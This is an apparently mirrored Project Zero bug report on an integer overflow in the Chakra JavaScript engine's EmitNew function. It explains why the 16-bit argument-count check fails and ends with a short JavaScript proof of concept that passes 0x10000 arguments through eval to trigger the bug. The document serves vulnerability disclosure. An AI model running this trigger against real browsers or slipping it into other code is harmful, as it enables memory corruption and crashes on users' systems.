29 lines
No EOL
957 B
HTML
29 lines
No EOL
957 B
HTML
<!--
|
|
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1315
|
|
|
|
The bytecode generator uses the "EmitNew" function to handle new operators.
|
|
Here's the code how the function checks for integer overflow.
|
|
void EmitNew(ParseNode* pnode, ByteCodeGenerator* byteCodeGenerator, FuncInfo* funcInfo)
|
|
{
|
|
Js::ArgSlot argCount = pnode->sxCall.argCount;
|
|
argCount++; // include "this"
|
|
|
|
BOOL fSideEffectArgs = FALSE;
|
|
unsigned int tmpCount = CountArguments(pnode->sxCall.pnodeArgs, &fSideEffectArgs);
|
|
Assert(argCount == tmpCount);
|
|
|
|
if (argCount != (Js::ArgSlot)argCount)
|
|
{
|
|
Js::Throw::OutOfMemory();
|
|
}
|
|
...
|
|
}
|
|
|
|
"Js::ArgSlot" is a 16 bit unsigned integer type. And "argCount" is of the type "Js::ArgSlot". So "if (argCount != (Js::ArgSlot)argCount)" has no point. It can't prevent the integer overflow at all.
|
|
|
|
PoC:
|
|
-->
|
|
|
|
let args = new Array(0x10000);
|
|
args = args.fill(0x1234).join(', ');
|
|
eval('new Array(' + args + ')'); |